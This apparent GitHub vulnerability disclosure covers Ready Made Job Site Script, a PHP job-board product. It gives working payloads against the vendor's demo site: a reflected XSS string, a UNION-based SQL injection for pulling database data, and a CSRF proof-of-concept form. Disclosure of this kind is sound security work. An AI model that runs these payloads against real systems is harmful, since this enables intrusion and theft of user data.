Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Ready Made Job Site Script SQLi/XSS/CSRF

ADLab of Venustech

Well, when I pentest the official demo site of Ready Made Job Site Script, I found some vulnerabilities here.

XSS:

There're some reflect-xss in this system, for example:

image

http://phpscriptsmall.biz/demo/onlinejobsearch/job

POST key para "keyword":

keyword='"><svg/onload=alert(/xss/)><'"&location_name[]=

image

SQLi:

There're some reflect-xss in this system, for example:

http://phpscriptsmall.biz/demo/onlinejobsearch/job

POST key para "location_name[]":

keyword=666&location_name[]=-1813) UNION ALL SELECT 6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,CONCAT(0x716a707071,0x4b7052435851504b686a5571556e74777a5a43616a5742614b4e466b7a424a6f4b6b59484a566a51,0x716b6b6b71),6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208,6208#

image

You can see, we can obtain the current data user or more sensitive data now!

CSRF

With the csrf bug, we can cheat the user to change some important content ,or get post reflect-xss attack here.

POC:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://phpscriptsmall.biz/demo/onlinejobsearch/job" method="POST">
      <input type="hidden" name="keyword" value="&apos;&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;&#47;xss&#47;&#41;&gt;&lt;&apos;&quot;" />
      <input type="hidden" name="location&#95;name&#91;&#93;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>